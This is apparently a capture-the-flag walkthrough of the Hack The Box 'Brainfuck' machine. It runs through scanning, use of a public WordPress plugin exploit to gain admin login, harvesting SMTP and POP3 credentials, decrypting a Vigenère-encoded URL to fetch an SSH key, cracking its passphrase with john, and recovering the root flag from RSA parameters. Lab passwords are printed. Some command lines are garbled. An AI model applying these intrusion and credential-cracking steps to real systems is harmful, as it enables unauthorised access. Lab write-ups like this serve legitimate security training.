Machine Ip :- 10.10.10.17
Nmap
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 94:d0:b3:34:e9:a5:37:c5:ac:b9:80:df:2a:54:a5:f0 (RSA)
| 256 6b:d5:dc:15:3a:66:7a:f4:19:91:5d:73:85:b2:4c:b2 (ECDSA)
|_ 256 23:f5:a3:33:33:9d:76:d5:f2:ea:69:71:e3:4e:8e:02 (ED25519)
25/tcp open smtp Postfix smtpd
|_smtp-commands: brainfuck, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: RESP-CODES TOP SASL(PLAIN) USER AUTH-RESP-CODE CAPA PIPELINING UIDL
143/tcp open imap Dovecot imapd
|_imap-capabilities: more IMAP4rev1 have post-login ENABLE ID OK SASL-IR listed LITERAL+ AUTH=PLAINA0001 LOGIN-REFERRALS capabilities Pre-login IDLE
443/tcp open ssl/http nginx 1.10.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD
|_http-server-header: nginx/1.10.0 (Ubuntu)
|_http-title: Welcome to nginx!
| ssl-cert: Subject: commonName=brainfuck.htb/organizationName=Brainfuck Ltd./stateOrProvinceName=Attica/countryName=GR
| Subject Alternative Name: DNS:www.brainfuck.htb, DNS:sup3rs3cr3t.brainfuck.htb
| Issuer: commonName=brainfuck.htb/organizationName=Brainfuck Ltd./stateOrProvinceName=Attica/countryName=GR
| Public Key type: rsa
| Public Key bits: 3072
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2017–04–13T11:19:29
| Not valid after: 2027–04–11T11:19:29
| MD5: cbf1 6899 96aa f7a0 0565 0fc0 9491 7f20
|_SHA-1: f448 e798 a817 5580 879c 8fb8 ef0e 2d3d c656 cb66
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
| tls-nextprotoneg:
|_ http/1.1Got 3 DNS in nmap enumeration
- brainfuck.htb
- sup3rs3cr3t.brainfuck.htb
- www.brainfuck.htb
After moving to HTTPS found nothing but the ngnix server running on it then i moved to https://brainfuck.htb and found a wordpress is running on it
And then i used wpscan tool to enumerate the site
wpscan -e ap — disable-tls-checks — url https://brainfuck.htbIn Wp-scan found vulnerable plugin
Got one exploit from searchsploit “exploits/php/webapps/41006.txt”
Here i created a html form at my local host and had some modification in it, with this exploit i get login as administrator at https://brainfuck.htb/
And then started my python server at port 80 and called the login.html from there
After this i again moved to https://brainfuck.htb and i got to see that i am now logged in with administrator user , but i didn’t found something useful there , then i again used login.html and changed the username from administrator to admin and let’s see what it does
Yup we are in logged in as admin now, when moving to wordpress from admin dashboard i get to see some plugins and found “Easy WP SMTP” and when we move to this plugin settings we get the password for smtp user orestis using intercept we gerp the password in plain text for smtp
Now we are having pop3 port open so let’s see what is this user having in his mails
Here i used pop3 commands for gathering information
LISTTOP 2 514 :- used this and got creds
username: orestis
password: kIEnnfEKJ#9UmdO Now i move to “https://sup3rs3cr3t.brainfuck.htb/” because the mail says these credentials are for secret forum and logged in using orestis creds there i found that the admin is sharing ssh access keys, in an encrypted way
And when we move to “ssh access” discussion we get to see that they are sharing ssh access key.
Then i moved in “Key” discussion I notice chatting between admin and orestis which was encrypted ,in the last reply of admin, it looks like admin is secretly sharing any encrypted URL.
After searching for a while i came to know that this is a ciphertext encryption which need a key to decrypt the text, so i just compared the conversation of key and ssh access , and found 👇
Pieagnm — Jkoijeg nbw zwx mle grwsnn Orestis — Hacking for fun and profit
And when we remove the spaces between them after a lot of website visiting i found something which was really help
Here i got the {BrainfuCkmybrainfuckmybrainfu} here we can “fuckmybrain” is repeating twice maybe this can help us in getting the url decrypt let’s give this a shot , Yup we got the url decrypted
mnvze://10.10.10.17/8zb5ra10m915218697q1h658wfoq0zc8/frmfycu/sp_ptrhttps://10.10.10.17/8ba5aa10e915218697d1c658cdee0bb8/orestis/id_rsa
Visiting the url it gives us id_rsa file while doing ssh it asks for a password so i used ssh2john.py script
With ssh2john.py i copied the file output of id_rsa for burte-forcing hte password
ssh2john.py id_rsa > id_rsa_1john — -wordlist=/usr/share/wordlists/rockyou.txt id_rsa_1
And found the password
3poulakia! (id_rsa)Logged in using the password and got USER.txt
But then there i found “encrypt.sage” which is having root.txt information in it, i just got a quick thought that there’s something related to root.txt from here while reading the encrypt.sage file i got to see 2 files which i am having in my directory , while searching for a while i got a python script which decrypt the .sage file at rsa_egcd.py form github and found that it’s having {p,q,e,ct}
While searching i found that ct = output.txt because it’s having encrypted , and p,q,e i took from debug.txt and pasted the code as they were in 3 partition i pasted them one by one at p,q and e respectively
And then i run the rsa python file and found the root hash
— — — — — — — — — — — — THANKYOU — — — — — — — — — — —
